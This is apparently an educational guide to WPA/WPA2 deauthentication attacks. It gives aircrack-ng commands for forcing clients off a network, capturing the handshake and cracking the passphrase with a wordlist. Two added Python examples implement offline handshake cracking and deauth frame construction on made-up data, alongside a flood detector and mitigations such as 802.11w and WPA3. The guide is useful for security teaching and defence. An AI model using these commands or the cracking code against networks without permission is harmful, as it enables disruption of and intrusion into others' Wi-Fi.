WPA/WPA2 Attacks: Deauthentication Explained

TL;DR

This guide explains how attackers use deauthentication frames to force a WPA/WPA2 client to reconnect, capture the resulting four-way handshake, and then attempt to recover the passphrase offline. We’ll cover how the attack works, the Aircrack-ng tools involved (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng), and what defenders should take away from it.

Understanding Deauthentication Attacks

Wi-Fi networks using WPA/WPA2-Personal derive their session keys from the pre-shared passphrase during a four-way handshake (four EAPOL-Key messages) each time a client joins. The first two messages carry everything an attacker needs to test passphrase guesses offline: the access point’s nonce, the client’s nonce, both MAC addresses, and a MIC computed under a key derived from the passphrase and SSID. Without a captured handshake there is nothing to check guesses against. Clients only perform the handshake when they (re)connect, so the most common way to obtain one on demand is to knock an associated client off the network with deauthentication frames and capture the handshake as it rejoins. This works because a deauthentication frame is an ordinary management frame with no cryptographic protection unless 802.11w (Protected Management Frames) is in use: any radio can transmit one with the access point’s address as the source, and the client will honour it.

Steps to Perform a Deauthentication Attack

  1. Put Your Wireless Interface into Monitor Mode: This lets the adapter receive every 802.11 frame on a channel, not just traffic for a network you are joined to. Use the command
    sudo airmon-ng start wlan0

    Replace ‘wlan0’ with your interface name (use ‘iw dev’ or ‘iwconfig’ to list interfaces). This usually creates a new monitor interface such as ‘wlan0mon’. If airmon-ng reports processes that could interfere (NetworkManager, wpa_supplicant), stop them first with ‘sudo airmon-ng check kill’, or the card may be pulled back out of monitor mode mid-capture. Not every chipset supports monitor mode and frame injection; if step 4 produces no effect, that is the first thing to check.

  2. Identify Your Target Network: Use
    sudo airodump-ng wlan0mon

    to scan nearby networks. Note the BSSID (the access point’s MAC address) and channel (CH column) of your target, and, in the lower table, the MAC addresses of clients (STATION column) associated with it. You need at least one associated client: deauthentication only yields a handshake if there is someone to reconnect.

  3. Capture the Handshake: Before injecting anything, lock airodump-ng to the target’s channel and BSSID in a second terminal and write to a capture file:
    sudo airodump-ng -c [channel] --bssid [BSSID] -w capture_file wlan0mon

    Replace ‘[channel]’ and ‘[BSSID]’ with the values from step 2. Locking the channel matters: if airodump-ng is still hopping it will be listening elsewhere when the client reconnects and the handshake is missed. Capture files are written with the prefix ‘capture_file’ (e.g. capture_file-01.cap). When the handshake is captured, the message “WPA handshake: [BSSID]” appears in the top-right of the airodump-ng header.

  4. Deauthenticate Clients: With the capture running, use aireplay-ng to inject deauthentication frames. These are unauthenticated management frames, so unless the network uses 802.11w Protected Management Frames the client accepts the spoofed frame, drops its association and reconnects, performing the four-way handshake again.
    • To deauthenticate a specific client (based on MAC address):
      sudo aireplay-ng -0 1 -a [BSSID] -c [Client MAC Address] wlan0mon

      Replace ‘[BSSID]’ with the network’s BSSID and ‘[Client MAC Address]’ with a client MAC from step 2. ‘-0 1’ sends one round of deauthentication frames (aireplay-ng reports “Sending 64 directed DeAuth”); ‘-0 0’ sends continuously until interrupted, which keeps the client from staying connected at all.

    • To deauthenticate all clients:
      sudo aireplay-ng -0 1 -a [BSSID] wlan0mon

      Without ‘-c’ the frames are addressed to the broadcast address. This hits every client at once, but some clients ignore broadcast deauthentication, and a flood aimed at every station is noisier and far easier for a wireless IDS to flag than a few directed frames.

  5. Crack the Handshake: Run aircrack-ng against the capture with a wordlist (a list of candidate passphrases). The check is entirely offline: for each candidate, PBKDF2 derives the pairwise master key from the passphrase and SSID, the pairwise transient key is derived from it together with the two MAC addresses and two nonces in the capture, and the MIC of the captured EAPOL message is recomputed and compared. No further contact with the network is needed.
    aircrack-ng -w /path/to/wordlist -b [BSSID] capture_file*.cap

    Replace ‘/path/to/wordlist’ with the actual path to your wordlist; ‘-b [BSSID]’ selects the network if the capture contains more than one. PBKDF2 costs 4096 HMAC-SHA1 iterations per guess, so throughput is limited, and a long random passphrase that appears in no wordlist is not recoverable this way.
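
The following is an added example, not aircrack-ng code or part of the original article. It reproduces the arithmetic behind step 5 so the offline nature of the attack is visible: the SSID, both MACs, ANonce, SNonce and the MIC of EAPOL message 2 all come from the capture, and the passphrase is the only unknown. The “captured” handshake is constructed in-process with made-up MAC addresses, nonces, SSID and wordlist; nothing here touches a radio or reads a .cap file.

```python
"""Offline check of a WPA2 four-way handshake against a wordlist (added example)."""
import hashlib
import hmac
import struct
from typing import Optional

# Offsets inside an EAPOL-Key frame: 4-byte 802.1X header, then descriptor
# type (1), key info (2), key length (2), replay counter (8), nonce (32),
# key IV (16), key RSC (8), key ID (8), MIC (16), key data length (2), key data.
NONCE_OFF = 4 + 1 + 2 + 2 + 8          # 17
MIC_OFF = NONCE_OFF + 32 + 16 + 8 + 8  # 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11 passphrase-to-PSK mapping: PBKDF2-HMAC-SHA1, 4096 rounds, 32-byte key.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # WPA2/CCMP (key descriptor version 2): HMAC-SHA1 over the whole EAPOL-Key frame
    # with the MIC field zeroed, truncated to 16 bytes. KCK = first 16 bytes of the PTK.
    zeroed = eapol_frame[:MIC_OFF] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFF + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN, key_data: bytes = b"") -> bytes:
    # Minimal EAPOL-Key message 2 (supplicant -> AP). Key Info 0x010A: descriptor
    # version 2 (HMAC-SHA1 MIC), Pairwise bit, MIC bit. Key data (RSN IE) left empty.
    body = struct.pack("!BHH", 2, 0x010A, 16)                   # descriptor type 2 (RSN), key info, key length
    body += struct.pack("!Q", 1)                                # replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # SNonce, key IV, key RSC, key ID
    body += mic + struct.pack("!H", len(key_data)) + key_data
    return struct.pack("!BBH", 1, 3, len(body)) + body          # 802.1X header: version 1, type 3 (Key), length


def supplicant_msg2(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes,
                    anonce: bytes, snonce: bytes) -> bytes:
    # What a legitimate client sends: message 2 with the MIC computed under the real passphrase.
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return build_eapol_msg2(snonce, eapol_mic(kck, build_eapol_msg2(snonce)))


def crack_handshake(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes,
                    eapol2: bytes, wordlist) -> Optional[str]:
    # Attacker's side: ANonce is read from captured message 1, SNonce and the MIC
    # from captured message 2. Each guess costs one PBKDF2 (4096 HMAC-SHA1 rounds).
    snonce = eapol2[NONCE_OFF:NONCE_OFF + 32]
    captured_mic = eapol2[MIC_OFF:MIC_OFF + MIC_LEN]
    for guess in wordlist:
        kck = derive_ptk(pmk_from_passphrase(guess, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol2), captured_mic):
            return guess
    return None


# Constructed sample (not real data): locally administered MACs, fixed nonces, tiny wordlist.
SAMPLE_SSID = "ExampleNet"
SAMPLE_AP_MAC = bytes.fromhex("02000000aa01")
SAMPLE_STA_MAC = bytes.fromhex("020000005b02")
SAMPLE_ANONCE = hashlib.sha256(b"constructed anonce").digest()
SAMPLE_SNONCE = hashlib.sha256(b"constructed snonce").digest()
SAMPLE_PASSPHRASE = "correct horse battery"
SAMPLE_WORDLIST = ["password", "12345678", "correct horse battery", "letmein123"]


def sample_capture() -> bytes:
    # Stand-in for the EAPOL frame airodump-ng would write to capture_file-01.cap.
    return supplicant_msg2(SAMPLE_PASSPHRASE, SAMPLE_SSID, SAMPLE_AP_MAC, SAMPLE_STA_MAC,
                           SAMPLE_ANONCE, SAMPLE_SNONCE)


def run_sample(wordlist=SAMPLE_WORDLIST) -> Optional[str]:
    return crack_handshake(SAMPLE_SSID, SAMPLE_AP_MAC, SAMPLE_STA_MAC, SAMPLE_ANONCE,
                           sample_capture(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", run_sample())
```

The MIC comparison is the whole “crack”: a wrong passphrase yields a wrong KCK and the recomputed MIC does not match. Note that `derive_ptk` is the WPA2-CCMP derivation; WPA/TKIP uses HMAC-MD5 for the MIC (key descriptor version 1), which aircrack-ng handles by reading the version bits from Key Info.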

Important Considerations

  • Legality: Performing these attacks on networks you don’t own or have permission to test is illegal in most jurisdictions.
  • Ethical Hacking: Only use this information for ethical hacking purposes, such as testing your own network’s security.
  • Detection: Deauthentication floods are detectable by wireless intrusion detection systems (a burst of deauthentication frames from one BSSID, typically with the same reason code, is a standard signature) and can alert network administrators.
  • Mitigation: Enable 802.11w Protected Management Frames where the access point and clients support it; a protected deauthentication frame carries a MIC the attacker cannot forge, so spoofed frames are discarded. Use a long, random passphrase so that a captured handshake cannot be cracked with a wordlist.
  • WPA3: WPA3 closes both halves of this attack. It mandates Protected Management Frames, so spoofed deauthentication is rejected, and its Simultaneous Authentication of Equals (SAE) handshake does not give an eavesdropper material for an offline dictionary attack, so even a captured exchange does not help.
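
The following is an added example, not code from the original article, aircrack-ng or any IDS product. It builds the raw 802.11 deauthentication frame that the aireplay-ng command in step 4 injects, to make visible why it can be spoofed: without 802.11w there is no MIC or any other field tied to a key, so the receiver has nothing to verify. It then applies the signature a wireless IDS uses (many deauthentication frames from one BSSID in a short window) to a constructed sample of frames. All MAC addresses and the traffic mix are made up; nothing is transmitted.

```python
"""802.11 deauthentication frame anatomy and a deauth-flood detector (added example)."""
import struct
from collections import Counter
from typing import Optional

TYPE_MGMT = 0
SUBTYPE_DEAUTH = 12
REASON_CLASS3_FRAME_FROM_NONASSOC_STA = 7   # 802.11 reason code 7
BROADCAST = b"\xff" * 6


def build_deauth(dest: bytes, bssid: bytes, reason: int = REASON_CLASS3_FRAME_FROM_NONASSOC_STA,
                 seq: int = 0) -> bytes:
    # Frame Control (little-endian): protocol version 0, type 0 (management),
    # subtype 12 (deauthentication), no flags -> bytes C0 00.
    frame_control = (SUBTYPE_DEAUTH << 4) | (TYPE_MGMT << 2)
    header = struct.pack("<HH", frame_control, 0)       # Frame Control, Duration/ID
    header += dest + bssid + bssid                       # Addr1 receiver, Addr2 transmitter (claims to be the AP), Addr3 BSSID
    header += struct.pack("<H", (seq & 0x0FFF) << 4)     # Sequence Control: sequence number, fragment 0
    return header + struct.pack("<H", reason)            # Fixed body: Reason Code. That is the entire frame.


def build_mgmt_header(subtype: int, dest: bytes, src: bytes, bssid: bytes) -> bytes:
    # Header of another management frame (e.g. subtype 8 = beacon), body omitted;
    # used only as non-deauth background traffic in the constructed sample.
    return struct.pack("<HH", (subtype << 4) | (TYPE_MGMT << 2), 0) + dest + src + bssid + struct.pack("<H", 0)


def parse_mgmt(frame: bytes) -> Optional[dict]:
    if len(frame) < 24:
        return None
    (fc,) = struct.unpack_from("<H", frame, 0)
    if (fc >> 2) & 0x3 != TYPE_MGMT:
        return None
    info = {"subtype": (fc >> 4) & 0xF, "dst": frame[4:10], "src": frame[10:16],
            "bssid": frame[16:22], "reason": None}
    if info["subtype"] == SUBTYPE_DEAUTH and len(frame) >= 26:
        (info["reason"],) = struct.unpack_from("<H", frame, 24)
    return info


def deauth_flood_alerts(frames, threshold: int) -> dict:
    # Count deauthentication frames per BSSID over the observed window and report
    # those at or above the threshold. Volume is the only evidence available: a
    # spoofed frame is byte-for-byte indistinguishable from a genuine one.
    counts = Counter()
    for frame in frames:
        info = parse_mgmt(frame)
        if info and info["subtype"] == SUBTYPE_DEAUTH:
            counts[info["bssid"]] += 1
    return {bssid: n for bssid, n in counts.items() if n >= threshold}


def mac_str(mac: bytes) -> str:
    return ":".join(f"{b:02x}" for b in mac)


# Constructed sample window: beacons from two APs, AP B legitimately dropping one
# client (reason 2, previous authentication no longer valid), and a 64-frame
# directed burst at a client of AP A, the shape of one aireplay-ng '-0 1' round.
AP_A = bytes.fromhex("02000000aa01")
AP_B = bytes.fromhex("02000000bb01")
CLIENT_A = bytes.fromhex("020000005b02")
CLIENT_B = bytes.fromhex("020000005b03")


def sample_window() -> list:
    frames = [build_mgmt_header(8, BROADCAST, ap, ap) for ap in (AP_A, AP_B) for _ in range(10)]
    frames.append(build_deauth(CLIENT_B, AP_B, reason=2))
    frames += [build_deauth(CLIENT_A, AP_A, seq=i) for i in range(64)]
    return frames


def run_sample(threshold: int = 10) -> dict:
    return {mac_str(b): n for b, n in deauth_flood_alerts(sample_window(), threshold).items()}


if __name__ == "__main__":
    for bssid, n in run_sample().items():
        print(f"ALERT {bssid}: {n} deauthentication frames in window")
```

The threshold is the tuning knob: a single deauthentication per client is normal (roaming, idle timeouts, an AP rebooting), so alert on rate, not presence. With 802.11w enabled the client simply drops unprotected deauthentication frames, which is why the detector is a compensating control rather than a fix.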